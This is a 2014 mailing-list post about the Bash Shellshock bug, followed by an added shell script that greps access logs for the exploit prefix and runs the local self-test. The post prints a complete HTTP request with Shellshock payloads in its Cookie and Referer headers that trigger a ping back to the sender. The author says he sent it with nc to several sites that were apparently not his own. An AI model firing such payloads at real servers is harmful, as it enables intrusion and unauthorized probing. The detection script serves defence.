[Haifux] The Bash vulnerability (shellshock)
Eli Billauer
eli at billauer.co.il
Fri Sep 26 12:30:36 IDT 2014
Hi everyone,
Happy new year! To make it even merrier, it seems like a rather
widespread vulnerability, based upon a bug in Bash (!), has been discovered:
http://www.engadget.com/2014/09/25/what-is-the-shellshock/
Or for short, type this on your bash console and see if you're cooked:
env x='() { :;}; echo vulnerable' bash -c 'echo This is a test'
If it says "vulnerable" before "This is a test", welcome to the club.
Odds are it will.
So the idea is that you can execute an arbitrary command on a remote
computer, if you can add an environment variable, and kick off a bash
shell with it.
Word has it that since the HTTP headers are passed to any CGI script as
environment variables (by Apache, for example), it's possible to use the
Referer or Cookie headers for this purpose.
So I tried this on a couple of sites (addresses mangled):
GET / HTTP/1.1
Host: thesite.com
Connection: keep-alive
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Mozilla/5.0 (X11; Linux i686 (x86_64)) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/27.0.1453.93 Safari/537.36
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Cookie: () { :; }; ping -c 3 93.1.9.2
Referer: () { :; }; ping -c 3 93.1.9.2
and then went
nc thesite.com 80 < therequest.txt
This was supposed to trigger a ping in my direction, but it didn't.
Instead, I found the full Referer string in the access log. Apparently,
it didn't work on my first go.
Insights, anyone? Does it mean that the tested site is safe, despite the
horror stories?
Regards,
Eli
--
Web: http://www.billauer.co.il
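Added example, not part of Eli's post: a small POSIX sh script that wraps the post's own bash self-test in a function, and scans Apache access-log lines for the "() {" function-definition prefix that the post reports finding in the access log. The log lines are constructed for the example (not real traffic) and use only the payload string that appears in the post; the function names, the log format (Apache "combined") and the source addresses are assumptions.

```shell
#!/bin/sh
# Added example (not from the original post). Two defender-side checks
# for the Bash environment-variable bug discussed above.

# Constructed sample lines in Apache "combined" log format (not real traffic):
#   client - - [date] "request" status bytes "Referer" "User-Agent"
# Lines 1 and 3 carry the "() { ...; }; ..." prefix from the post in the
# Referer and User-Agent fields; line 2 is an ordinary request.
SAMPLE_LOG='203.0.113.5 - - [26/Sep/2014:12:30:36 +0300] "GET / HTTP/1.1" 200 612 "() { :; }; ping -c 3 93.1.9.2" "Mozilla/5.0"
203.0.113.6 - - [26/Sep/2014:12:31:00 +0300] "GET /index.html HTTP/1.1" 200 612 "http://example.com/" "Mozilla/5.0"
203.0.113.7 - - [26/Sep/2014:12:32:00 +0300] "GET /cgi-bin/status HTTP/1.1" 200 12 "-" "() { :;}; ping -c 3 93.1.9.2"'

# Bash only treats a variable as an exported function when its value starts
# with "()" followed by "{", so that prefix is what to look for in any
# header-derived field. Optional whitespace between ")" and "{" is allowed.
SHELLSHOCK_PREFIX='\(\)[[:space:]]*\{'

# Print how many log lines (passed as one string) contain the prefix.
count_shellshock_lines() {
    printf '%s\n' "$1" | grep -Ec "$SHELLSHOCK_PREFIX"
}

# Print the unique client addresses (first field) of matching lines,
# one per line, sorted.
shellshock_sources() {
    printf '%s\n' "$1" | grep -E "$SHELLSHOCK_PREFIX" | awk '{print $1}' | sort -u
}

# The post's own self-test, wrapped so a script can branch on it: return 0
# (true) when the local bash runs the code after the function body, i.e.
# prints "vulnerable" before "This is a test"; return 1 otherwise.
bash_is_vulnerable() {
    out=$(env x='() { :;}; echo vulnerable' bash -c 'echo This is a test' 2>/dev/null)
    case "$out" in
        vulnerable*) return 0 ;;
        *) return 1 ;;
    esac
}

# Stand-alone run: report on the constructed sample, then on the local bash.
printf 'suspicious log lines: %s\n' "$(count_shellshock_lines "$SAMPLE_LOG")"
printf 'sources:\n%s\n' "$(shellshock_sources "$SAMPLE_LOG")"
if bash_is_vulnerable; then
    echo 'local bash: vulnerable'
else
    echo 'local bash: not vulnerable (or bash not installed)'
fi
```

The log scan is the check that the post's own observation points at: a request like the one Eli sent lands in the access log with the payload intact, so the prefix can be grepped for after the fact, whether or not a CGI script was ever reached. A match only proves that someone sent the string; whether it executed depends on the bash version behind the CGI handler, which is what the self-test answers for the local machine.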